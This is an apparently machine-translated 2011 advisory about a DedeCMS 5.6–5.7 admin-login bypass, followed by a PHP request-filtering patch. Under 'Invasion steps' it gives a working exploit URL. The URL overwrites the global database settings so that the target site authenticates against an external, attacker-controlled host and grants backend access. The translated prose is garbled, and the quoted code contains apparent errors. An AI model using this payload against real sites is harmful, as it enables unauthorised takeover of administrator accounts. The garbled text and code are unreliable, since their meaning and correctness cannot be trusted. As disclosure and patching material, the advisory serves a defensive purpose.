DedeCms v5. 6-5. 7 explosion serious security vulnerability free account and password directly into the background-bug warning-the black bar safety net

2011-08-12T00:00:00
ID MYHACK58:62201131561
Type myhack58
Reporter 佚名
Modified 2011-08-12T00:00:00

Description

As is well known, due to the use of simple, customer base, and more, weaving dreams CMS has been broke many vulnerabilities. Today xiaobian in the group to get the woven dream official forum, a moderator and reliable message:“DEDECMS explosion serious security vulnerability, the recent official will release the patch, hope everyone to pay attention to the patch dynamics.”

Invasion steps are as follows:

http://www.xx.com/ 织 梦 网站 后台 /login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

The top black bottom yellow words on the letters changed to the current verification code, you can directly enter the website backstage.

Xiaobian analysis about the vulnerability of the premise is MUST to get the backend path can be achieved, therefore we must develop the habit of using DEDECM the establishment of the station when you change back the name of the habit. Next to the official solution:

Solution:

Find the include/common. inc. php file, put:

foreach($_REQUEST as $_k= > $_v)

{

var_dump($_k);

if( strlen($k)>0 && preg_match('#^(cfg|GLOBALS)#',$_k) )

{

exit('Request var not allow!');

}

}

Replaced with: the

//Check and registration outside the submitted variables

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k= > $_v) {

CheckRequest($_k);

CheckRequest($val[$_k]);

}

} else

{

if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )

{

exit('Request var not allow!');

}

}

}

CheckRequest($_REQUEST);